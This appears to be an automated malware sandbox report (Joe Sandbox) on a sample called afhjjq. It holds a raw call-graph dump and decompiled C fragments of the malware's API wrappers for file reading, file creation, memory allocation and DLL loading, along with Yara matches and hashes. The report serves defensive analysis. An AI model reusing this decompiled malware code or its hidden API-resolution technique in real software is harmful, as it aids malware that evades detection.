22466->22848 22469 409d55 22469->22392 22471 40f1c2 22472 40f1ed 22471->22472 22854 41a220 22471->22854 22474 41a450 2 API calls 22472->22474 22474->22469 22497 41a5c0 22475->22497 22479 41b289 22478->22479 22510 414a40 22479->22510 22481 41b2a1 22482 41b2aa 22481->22482 22549 41b0b0 22481->22549 22482->22451 22484 41b2be 22484->22482 22567 419ec0 22484->22567 22817 407ea0 22489->22817 22491 409ac1 22491->22453 22492 409aba 22492->22491 22830 408160 22492->22830 22495->22445 22496->22455 22500 41af20 22497->22500 22499 418a45 22499->22449 22501 41af30 22500->22501 22502 41af52 22500->22502 22504 414e40 22501->22504 22502->22499 22505 414e4e 22504->22505 22506 414e5a 22504->22506 22505->22506 22509 4152c0 LdrLoadDll 22505->22509 22506->22502 22508 414fac 22508->22502 22509->22508 22511 414d75 22510->22511 22521 414a54 22510->22521 22511->22481 22514 414b6d 22514->22481 22515 414b80 22576 41a320 22515->22576 22516 414b63 22633 41a420 LdrLoadDll 22516->22633 22519 414ba7 22520 41bd80 2 API calls 22519->22520 22523 414bb3 22520->22523 22521->22511 22573 419c10 22521->22573 22522 414d39 22525 41a450 2 API calls 22522->22525 22523->22514 22523->22522 22524 414d4f 22523->22524 22529 414c42 22523->22529 22642 414780 LdrLoadDll NtReadFile NtClose 22524->22642 22526 414d40 22525->22526 22526->22481 22528 414d62 22528->22481 22530 414ca9 22529->22530 22532 414c51 22529->22532 22530->22522 22531 414cbc 22530->22531 22635 41a2a0 22531->22635 22534 414c56 22532->22534 22535 414c6a 22532->22535 22634 414640 LdrLoadDll NtClose 22534->22634 22536 414c87 22535->22536 22537 414c6f 22535->22537 22536->22526 22591 414400 22536->22591 22579 4146e0 22537->22579 22540 414c60 22540->22481 22543 414c7d 22543->22481 22545 414d1c 22639 41a450 22545->22639 22547 414c9f 22547->22481 22548 414d28 22548->22481 22551 41b0c1 22549->22551 22550 41b0d3 22550->22484 22551->22550 22660 41bd00 22551->22660 22553 41b0f4 22663 414060 22553->22663 22555 41b140 22555->22484 22556 41b117 22556->22555 22557 414060 3 API calls 22556->22557 22560 41b139 22557->22560 22559 41b1ca 22561 41b1da 22559->22561 22787 41aec0 LdrLoadDll 22559->22787 22560->22555 22695 415380 22560->22695 22705 41ad30 22561->22705 22564 41b208 22784 419e80 22564->22784 22568 41af20 LdrLoadDll 22567->22568 22569 419edc 22568->22569 22570 41bd80 22569->22570 22571 41b319 22570->22571 22814 41a630 22570->22814 22571->22451 22574 414b34 22573->22574 22575 41af20 LdrLoadDll 22573->22575 22574->22514 22574->22515 22574->22516 22575->22574 22577 41a33c NtCreateFile 22576->22577 22578 41af20 LdrLoadDll 22576->22578 22577->22519 22578->22577 22580 4146fc 22579->22580 22581 41a2a0 LdrLoadDll 22580->22581 22582 41471d 22581->22582 22583 414724 22582->22583 22584 414738 22582->22584 22586 41a450 2 API calls 22583->22586 22585 41a450 2 API calls 22584->22585 22587 414741 22585->22587 22588 41472d 22586->22588 22643 41bf90 LdrLoadDll RtlAllocateHeap 22587->22643 22588->22543 22590 41474c 22590->22543 22592 41444b 22591->22592 22593 41447e 22591->22593 22595 41a2a0 LdrLoadDll 22592->22595 22594 4145c9 22593->22594 22597 41449a 22593->22597 22596 41a2a0 LdrLoadDll 22594->22596 22598 414466 22595->22598 22603 4145e4 22596->22603 22599 41a2a0 LdrLoadDll 22597->22599 22600 41a450 2 API calls 22598->22600 22601 4144b5 22599->22601 22602 41446f 22600->22602 22605 4144d1 22601->22605 22606 4144bc 22601->22606 22602->22547 22656 41a2e0 LdrLoadDll 22603->22656 22609 4144d6 22605->22609 22613 4144ec 22605->22613 22608 41a450 2 API calls 22606->22608 22607 41461e 22610 41a450 2 API calls 22607->22610 22611 4144c5 22608->22611 22612 41a450 2 API calls 22609->22612 22614 414629 22610->22614 22611->22547 22615 4144df 22612->22615 22616 4144f1 22613->22616 22644 41bf50 22613->22644 22614->22547 22615->22547 22620 414503 22616->22620 22647 41a3d0 22616->22647 22619 414557 22621 41456e 22619->22621 22655 41a260 LdrLoadDll 22619->22655 22620->22547 22623 414575 22621->22623 22624 41458a 22621->22624 22625 41a450 2 API calls 22623->22625 22626 41a450 2 API calls 22624->22626 22625->22620 22627 414593 22626->22627 22628 4145bf 22627->22628 22650 41bb50 22627->22650 22628->22547 22630 4145aa 22631 41bd80 2 API calls 22630->22631 22632 4145b3 22631->22632 22632->22547 22633->22514 22634->22540 22636 41af20 LdrLoadDll 22635->22636 22637 414d04 22635->22637 22636->22637 22638 41a2e0 LdrLoadDll 22637->22638 22638->22545 22640 41af20 LdrLoadDll 22639->22640 22641 41a46c NtClose 22640->22641 22641->22548 22642->22528 22643->22590 22657 41a5f0 22644->22657 22646 41bf68 22646->22616 22648 41af20 LdrLoadDll 22647->22648 22649 41a3ec NtReadFile 22648->22649 22649->22619 22651 41bb74 22650->22651 22652 41bb5d 22650->22652 22651->22630 22652->22651 22653 41bf50 2 API calls 22652->22653 22654 41bb8b 22653->22654 22654->22630 22655->22621 22656->22607 22658 41af20 LdrLoadDll 22657->22658 22659 41a60c RtlAllocateHeap 22658->22659 22659->22646 22661 41bd2d 22660->22661 22788 41a500 22660->22788 22661->22553 22664 414071 22663->22664 22666 414079 22663->22666 22664->22556 22665 41434c 22665->22556 22666->22665 22791 41cef0 22666->22791 22668 4140cd 22669 41cef0 2 API calls 22668->22669 22673 4140d8 22669->22673 22670 414126 22672 41cef0 2 API calls 22670->22672 22676 41413a 22672->22676 22673->22670 22674 41d020 3 API calls 22673->22674 22802 41cf90 LdrLoadDll RtlAllocateHeap RtlFreeHeap 22673->22802 22674->22673 22675 414197 22677 41cef0 2 API calls 22675->22677 22676->22675 22796 41d020 22676->22796 22678 4141ad 22677->22678 22680 4141ea 22678->22680 22682 41d020 3 API calls 22678->22682 22681 41cef0 2 API calls 22680->22681 22683 4141f5 22681->22683 22682->22678 22684 41d020 3 API calls 22683->22684 22690 41422f 22683->22690 22684->22683 22686 414324 22804 41cf50 LdrLoadDll RtlFreeHeap 22686->22804 22688 41432e 22805 41cf50 LdrLoadDll RtlFreeHeap 22688->22805 22803 41cf50 LdrLoadDll RtlFreeHeap 22690->22803 22691 414338 22806 41cf50 LdrLoadDll RtlFreeHeap 22691->22806 22693 414342 22807 41cf50 LdrLoadDll RtlFreeHeap 22693->22807 22696 415391 22695->22696 22697 414a40 6 API calls 22696->22697 22699 4153a7 22697->22699 22698 4153fa 22698->22559 22699->22698 22700 4153e2 22699->22700 22701 4153f5 22699->22701 22703 41bd80 2 API calls 22700->22703 22702 41bd80 2 API calls 22701->22702 22702->22698 22704 4153e7 22703->22704 22704->22559 22706 41ad44 22705->22706 22707 41abf0 LdrLoadDll 22705->22707 22808 41abf0 22706->22808 22707->22706 22709 41ad4d 22710 41abf0 LdrLoadDll 22709->22710 22711 41ad56 22710->22711 22712 41abf0 LdrLoadDll 22711->22712 22713 41ad5f 22712->22713 22714 41abf0 LdrLoadDll 22713->22714 22715 41ad68 22714->22715 22716 41abf0 LdrLoadDll 22715->22716 22717 41ad71 22716->22717 22718 41abf0 LdrLoadDll 22717->22718 22719 41ad7d 22718->22719 22720 41abf0 LdrLoadDll 22719->22720 22721 41ad86 22720->22721 22722 41abf0 LdrLoadDll 22721->22722 22723 41ad8f 22722->22723 22724 41abf0 LdrLoadDll 22723->22724 22725 41ad98 22724->22725 22726 41abf0 LdrLoadDll 22725->22726 22727 41ada1 22726->22727 22728 41abf0 LdrLoadDll 22727->22728 22729 41adaa 22728->22729 22730 41abf0 LdrLoadDll 22729->22730 22731 41adb6 22730->22731 22732 41abf0 LdrLoadDll 22731->22732 22733 41adbf 22732->22733 22734 41abf0 LdrLoadDll 22733->22734 22735 41adc8 22734->22735 22736 41abf0 LdrLoadDll 22735->22736 22737 41add1 22736->22737 22738 41abf0 LdrLoadDll 22737->22738 22739 41adda 22738->22739 22740 41abf0 LdrLoadDll 22739->22740 22741 41ade3 22740->22741 22742 41abf0 LdrLoadDll 22741->22742 22743 41adef 22742->22743 22744 41abf0 LdrLoadDll 22743->22744 22745 41adf8 22744->22745 22746 41abf0 LdrLoadDll 22745->22746 22747 41ae01 22746->22747 22748 41abf0 LdrLoadDll 22747->22748 22749 41ae0a 22748->22749 22750 41abf0 LdrLoadDll 22749->22750 22751 41ae13 22750->22751 22752 41abf0 LdrLoadDll 22751->22752 22753 41ae1c 22752->22753 22754 41abf0 LdrLoadDll 22753->22754 22755 41ae28 22754->22755 22756 41abf0 LdrLoadDll 22755->22756 22757 41ae31 22756->22757 22758 41abf0 LdrLoadDll 22757->22758 22759 41ae3a 22758->22759 22760 41abf0 LdrLoadDll 22759->22760 22761 41ae43 22760->22761 22762 41abf0 LdrLoadDll 22761->22762 22763 41ae4c 22762->22763 22764 41abf0 LdrLoadDll 22763->22764 22765 41ae55 22764->22765 22766 41abf0 LdrLoadDll 22765->22766 22767 41ae61 22766->22767 22768 41abf0 LdrLoadDll 22767->22768 22769 41ae6a 22768->22769 22770 41abf0 LdrLoadDll 22769->22770 22771 41ae73 22770->22771 22772 41abf0 LdrLoadDll 22771->22772 22773 41ae7c 22772->22773 22774 41abf0 LdrLoadDll 22773->22774 22775 41ae85 22774->22775 22776 41abf0 LdrLoadDll 22775->22776 22777 41ae8e 22776->22777 22778 41abf0 LdrLoadDll 22777->22778 22779 41ae9a 22778->22779 22780 41abf0 LdrLoadDll 22779->22780 22781 41aea3 22780->22781 22782 41abf0 LdrLoadDll 22781->22782 22783 41aeac 22782->22783 22783->22564 22785 41af20 LdrLoadDll 22784->22785 22786 419e9c 22785->22786 22786->22484 22787->22561 22789 41a51c NtAllocateVirtualMemory 22788->22789 22790 41af20 LdrLoadDll 22788->22790 22789->22661 22790->22789 22792 41cf00 22791->22792 22793 41cf06 22791->22793 22792->22668 22794 41bf50 2 API calls 22793->22794 22795 41cf2c 22794->22795 22795->22668 22797 41cf90 22796->22797 22798 41bf50 2 API calls 22797->22798 22799 41cfed 22797->22799 22800 41cfca 22798->22800 22799->22676 22801 41bd80 2 API calls 22800->22801 22801->22799 22802->22673 22803->22686 22804->22688 22805->22691 22806->22693 22807->22665 22809 41ac0b 22808->22809 22810 414e40 LdrLoadDll 22809->22810 22811 41ac2b 22810->22811 22812 414e40 LdrLoadDll 22811->22812 22813 41acd7 22811->22813 22812->22813 22813->22709 22813->22813 22815 41a64c RtlFreeHeap 22814->22815 22816 41af20 LdrLoadDll 22814->22816 22815->22571 22816->22815 22818 407eb0 22817->22818 22819 407eab 22817->22819 22820 41bd00 2 API calls 22818->22820 22819->22492 22823 407ed5 22820->22823 22821 407f38 22821->22492 22822 419e80 LdrLoadDll 22822->22823 22823->22821 22823->22822 22824 407f3e 22823->22824 22828 41bd00 2 API calls 22823->22828 22833 41a580 22823->22833 22826 407f64 22824->22826 22827 41a580 LdrLoadDll 22824->22827 22826->22492 22829 407f55 22827->22829 22828->22823 22829->22492 22831 41a580 LdrLoadDll 22830->22831 22832 40817e 22831->22832 22832->22453 22834 41af20 LdrLoadDll 22833->22834 22835 41a59c 22834->22835 22835->22823 22837 41b583 22836->22837 22840 40ace0 22837->22840 22841 40ad04 22840->22841 22842 40ad40 LdrLoadDll 22841->22842 22843 409c3a 22841->22843 22842->22843 22843->22459 22845 40b053 22844->22845 22847 40b0d0 22845->22847 22857 419c50 LdrLoadDll 22845->22857 22847->22466 22849 41af20 LdrLoadDll 22848->22849 22850 40f1ab 22849->22850 22850->22469 22851 41a790 22850->22851 22852 41a7af LookupPrivilegeValueW 22851->22852 22853 41af20 LdrLoadDll 22851->22853 22852->22471 22853->22852 22855 41a23c 22854->22855 22856 41af20 LdrLoadDll 22854->22856 22855->22472 22856->22855 22857->22847 22859 40b1e0 22858->22859 22860 40b030 LdrLoadDll 22859->22860 22861 40b1f4 22860->22861 22861->22408 22863 40ae41 22862->22863 22864 40ae3d 22862->22864 22865 40ae8c 22863->22865 22866 40ae5a 22863->22866 22864->22411 22901 419c90 LdrLoadDll 22865->22901 22900 419c90 LdrLoadDll 22866->22900 22868 40ae9d 22868->22411 22870 40ae7c 22870->22411 22872 40f490 LdrLoadDll 22871->22872 22873 4143b6 22872->22873 22873->22413 22877 408a79 22874->22877 22902 4087a0 22874->22902 22876 408a9d 22876->22415 22877->22876 22878 4087a0 8 API calls 22877->22878 22879 408a8a 22878->22879 22879->22876 22920 40f700 6 API calls 22879->22920 22882 41af20 LdrLoadDll 22881->22882 22883 40c312 22882->22883 22884 40f490 22883->22884 22885 40f4ad 22884->22885 23033 419f80 22885->23033 22888 40f4f5 22888->22419 22889 419fd0 LdrLoadDll 22890 40f51e 22889->22890 22890->22419 22892 41af20 LdrLoadDll 22891->22892 22893 40c375 22892->22893 22893->22425 22893->22428 22895 41af20 LdrLoadDll 22894->22895 22896 40c449 22895->22896 22896->22436 22898 41af20 LdrLoadDll 22897->22898 22899 40c49c 22898->22899 22899->22440 22900->22870 22901->22868 22903 407ea0 2 API calls 22902->22903 22918 4087ba 22902->22918 22903->22918 22904 408a49 22904->22877 22905 408a3f 22906 408160 LdrLoadDll 22905->22906 22906->22904 22909 419ec0 LdrLoadDll 22909->22918 22911 41a450 LdrLoadDll NtClose 22911->22918 22914 40c4b0 LdrLoadDll NtClose 22914->22918 22917 419de0 LdrLoadDll 22917->22918 22918->22904 22918->22905 22918->22909 22918->22911 22918->22914 22918->22917 22921 419cd0 22918->22921 22924 4085d0 22918->22924 22936 40f5e0 LdrLoadDll NtClose 22918->22936 22937 419d50 LdrLoadDll 22918->22937 22938 419d80 LdrLoadDll 22918->22938 22939 419e10 LdrLoadDll 22918->22939 22940 4083a0 22918->22940 22956 405f60 LdrLoadDll 22918->22956 22920->22876 22922 419cec 22921->22922 22923 41af20 LdrLoadDll 22921->22923 22922->22918 22923->22922 22925 4085e6 22924->22925 22957 419840 22925->22957 22927 4085ff 22932 408771 22927->22932 22978 4081a0 22927->22978 22929 4086e5 22930 4083a0 7 API calls 22929->22930 22929->22932 22931 408713 22930->22931 22931->22932 22933 419ec0 LdrLoadDll 22931->22933 22932->22918 22934 408748 22933->22934 22934->22932 22935 41a4c0 LdrLoadDll 22934->22935 22935->22932 22936->22918 22937->22918 22938->22918 22939->22918 22941 4083c9 22940->22941 23012 408310 22941->23012 22944 41a4c0 LdrLoadDll 22945 4083dc 22944->22945 22945->22944 22946 408467 22945->22946 22948 408462 22945->22948 23020 40f660 22945->23020 22946->22918 22947 41a450 2 API calls 22949 40849a 22947->22949 22948->22947 22949->22946 22950 419cd0 LdrLoadDll 22949->22950 22951 4084ff 22950->22951 22951->22946 23024 419d10 22951->23024 22953 408563 22953->22946 22954 414a40 6 API calls 22953->22954 22955 4085b8 22954->22955 22955->22918 22956->22918 22958 41bf50 2 API calls 22957->22958 22959 419857 22958->22959 22985 409310 22959->22985 22961 419872 22962 4198b0 22961->22962 22963 419899 22961->22963 22966 41bd00 2 API calls 22962->22966 22964 41bd80 2 API calls 22963->22964 22965 4198a6 22964->22965 22965->22927 22967 4198ea 22966->22967 22968 41bd00 2 API calls 22967->22968 22969 419903 22968->22969 22975 419ba4 22969->22975 22991 41bd40 22969->22991 22972 419b90 22973 41bd80 2 API calls 22972->22973 22974 419b9a 22973->22974 22974->22927 22976 41bd80 2 API calls 22975->22976 22977 419bf9 22976->22977 22977->22927 22979 40829f 22978->22979 22980 4081b5 22978->22980 22979->22929 22980->22979 22981 414a40 6 API calls 22980->22981 22982 408222 22981->22982 22983 41bd80 2 API calls 22982->22983 22984 408249 22982->22984 22983->22984 22984->22929 22986 409335 22985->22986 22987 40ace0 LdrLoadDll 22986->22987 22988 409368 22987->22988 22990 40938d 22988->22990 22994 40cf10 22988->22994 22990->22961 23009 41a540 22991->23009 22995 40cf3c 22994->22995 22996 41a1a0 LdrLoadDll 22995->22996 22997 40cf55 22996->22997 22998 40cf5c 22997->22998 23005 41a1e0 22997->23005 22998->22990 23002 40cf97 23003 41a450 2 API calls 23002->23003 23004 40cfba 23003->23004 23004->22990 23006 40cf7f 23005->23006 23007 41af20 LdrLoadDll 23005->23007 23006->22998 23008 41a7d0 LdrLoadDll 23006->23008 23007->23006 23008->23002 23010 41af20 LdrLoadDll 23009->23010 23011 419b89 23010->23011 23011->22972 23011->22975 23013 408328 23012->23013 23014 40ace0 LdrLoadDll 23013->23014 23015 408343 23014->23015 23016 414e40 LdrLoadDll 23015->23016 23017 408353 23016->23017 23018 40835c PostThreadMessageW 23017->23018 23019 408370 23017->23019 23018->23019 23019->22945 23021 40f673 23020->23021 23029 419e50 23021->23029 23025 419d2c 23024->23025 23026 41af20 LdrLoadDll 23024->23026 23025->22953 23027 41af20 LdrLoadDll 23025->23027 23026->23025 23028 419d6c 23027->23028 23028->22953 23030 419e5a 23029->23030 23031 41af20 LdrLoadDll 23030->23031 23032 40f69e 23031->23032 23032->22945 23034 40f4ee 23033->23034 23035 41af20 LdrLoadDll 23033->23035 23034->22888 23034->22889 23035->23034

                            Executed Functions

                            Function 0041A3D0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 41a3d0-41a419 call 41af20 NtReadFile
                            C-Code - Quality: 37%
                            			E0041A3D0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AF20(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x414a21
				_t6 =  &_a32; // 0x414d62
				_t12 =  &_a8; // 0x414d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                            0x0041a3d3
                            0x0041a3df
                            0x0041a3e7
                            0x0041a3ec
                            0x0041a3f2
                            0x0041a40d
                            0x0041a415
                            0x0041a419

                            APIs
                            • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID: !JA$bMA$bMA
                            • API String ID: 2738559852-4222312340
                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                            • Instruction ID: 54437c4e75339082d0912fbe7e6c9053912bd6928cda1a9760da43cab1c95c7d
                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                            • Instruction Fuzzy Hash: C3F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241D630E8518BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 231 40ace0-40acfc 232 40ad04-40ad09 231->232 233 40acff call 41cc10 231->233 234 40ad0b-40ad0e 232->234 235 40ad0f-40ad1d call 41d030 232->235 233->232 238 40ad2d-40ad3e call 41b460 235->238 239 40ad1f-40ad2a call 41d2b0 235->239 244 40ad40-40ad54 LdrLoadDll 238->244 245 40ad57-40ad5a 238->245 239->238 244->245
                            C-Code - Quality: 100%
                            			E0040ACE0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041CC10( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041D030(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041D2B0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B460(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                            0x0040acfc
                            0x0040acff
                            0x0040ad04
                            0x0040ad09
                            0x0040ad13
                            0x0040ad18
                            0x0040ad1b
                            0x0040ad1d
                            0x0040ad25
                            0x0040ad2a
                            0x0040ad2a
                            0x0040ad31
                            0x0040ad39
                            0x0040ad3c
                            0x0040ad3e
                            0x0040ad52
                            0x00000000
                            0x0040ad54
                            0x0040ad5a
                            0x0040ad0e
                            0x0040ad0e
                            0x0040ad0e

                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                            • Instruction ID: 93036d1b31c8ba6342ae8de3f2893f5930aff37f33252288d1eb8296453bc5b5
                            • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                            • Instruction Fuzzy Hash: FF015EB5E0020DABDB10EBA1DC42FDEB3789F14308F0041AAE908A7281F634EB54CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A31A Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 246 41a31a-41a371 call 41af20 NtCreateFile
                            C-Code - Quality: 82%
                            			E0041A31A(void* __ebx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t22;
				intOrPtr _t33;

				asm("in al, 0x95");
				_t33 =  *((intOrPtr*)(__ebx - 0x74aa8a9e));
				_t16 = _a4;
				_t4 = _t16 + 0xc40; // 0xc40
				E0041AF20(_t33, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t22 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t22;
			}





                            0x0041a31a
                            0x0041a31c
                            0x0041a323
                            0x0041a32f
                            0x0041a337
                            0x0041a36d
                            0x0041a371

                            APIs
                            • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: d64fa3819765822cd3263a40e8e4ae7d40bac1ed462ead2d3ad675bf57a2a165
                            • Instruction ID: d373012d45d010d8cb68f1ec5b04cc2f7f3797cca48e3b8bbe75b11df1b0945e
                            • Opcode Fuzzy Hash: d64fa3819765822cd3263a40e8e4ae7d40bac1ed462ead2d3ad675bf57a2a165
                            • Instruction Fuzzy Hash: 4201B2B2201108AFCB18DF98DC85EEB77AABF8C354F158248FA1DD7241C630E851CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A320 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 249 41a320-41a336 250 41a33c-41a371 NtCreateFile 249->250 251 41a337 call 41af20 249->251 251->250
                            C-Code - Quality: 100%
                            			E0041A320(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AF20(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                            0x0041a32f
                            0x0041a337
                            0x0041a36d
                            0x0041a371

                            APIs
                            • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                            • Instruction ID: 30690d9e011530b668ed3b4ae7cc5c3fda29d367b226dbf4f68f65ca016a7565
                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                            • Instruction Fuzzy Hash: FDF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A4FA Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 252 41a4fa-41a53d call 41af20 NtAllocateVirtualMemory
                            C-Code - Quality: 82%
                            			E0041A4FA(void* __eax, intOrPtr* __edi, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t15;
				intOrPtr _t29;

				asm("out dx, eax");
				 *__edi = _t29;
				_t11 = _a4;
				_t3 = _t11 + 0xc60; // 0xca0
				E0041AF20(__edi, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t15;
			}





                            0x0041a4fa
                            0x0041a4fb
                            0x0041a503
                            0x0041a50f
                            0x0041a517
                            0x0041a539
                            0x0041a53d

                            APIs
                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateMemoryVirtual
                            • String ID:
                            • API String ID: 2167126740-0
                            • Opcode ID: 246d36a4a50b9289f1e0a6a461cc62c4a4b3b91b9faffa942a46cc189b6a47af
                            • Instruction ID: 1ed7b12833813d4d0e766ee54224deb5541203d92298c41f70362a7cc4aef1ad
                            • Opcode Fuzzy Hash: 246d36a4a50b9289f1e0a6a461cc62c4a4b3b91b9faffa942a46cc189b6a47af
                            • Instruction Fuzzy Hash: FCF058B2200109AFDB14DF89CC80EEB77AAAF8C354F108109FA0CD7240C630E821CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A500 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 255 41a500-41a516 256 41a51c-41a53d NtAllocateVirtualMemory 255->256 257 41a517 call 41af20 255->257 257->256
                            C-Code - Quality: 100%
                            			E0041A500(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AF20(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                            0x0041a50f
                            0x0041a517
                            0x0041a539
                            0x0041a53d

                            APIs
                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateMemoryVirtual
                            • String ID:
                            • API String ID: 2167126740-0
